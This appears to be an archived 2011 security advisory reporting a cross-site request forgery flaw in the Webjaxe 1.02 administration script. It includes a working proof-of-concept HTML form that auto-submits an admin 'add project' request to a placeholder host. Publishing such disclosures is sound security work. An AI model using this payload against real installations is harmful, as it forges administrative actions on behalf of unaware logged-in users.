[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HTB22927: CSRF (Cross-Site Request Forgery) in Webjaxe



Vulnerability ID: HTB22927
Reference: http://www.htbridge.ch/advisory/csrf_cross_site_request_forgery_in_webjaxe.html
Product: Webjaxe
Vendor: Webjaxe ( http://media4.obspm.fr/outils/webjaxe/en/ ) 
Vulnerable Version: 1.02
Vendor Notification: 29 March 2011 
Vulnerability Type: CSRF (Cross-Site Request Forgery)
Risk level: Low 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/php/partie_administrateur/administration.php" script to properly verify the source of HTTP request.
Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
Attacker can use browser to exploit this vulnerability. The following PoC is available:

[html]
<form action="http://[host]/php/partie_administrateur/administration.php"; method="post" name="main" id="main">
<input type="hidden" name="action" value="ajouter_projet">
<input type="hidden" name="titre_projet" value="123123">
<input type="hidden" name="ajouter" value="Add">
<input type="hidden" name="submit" value="OK">
<input type="submit" id="btn"> 
</form>
<script>
document.getElementById('btn').click();
</script>
[/html]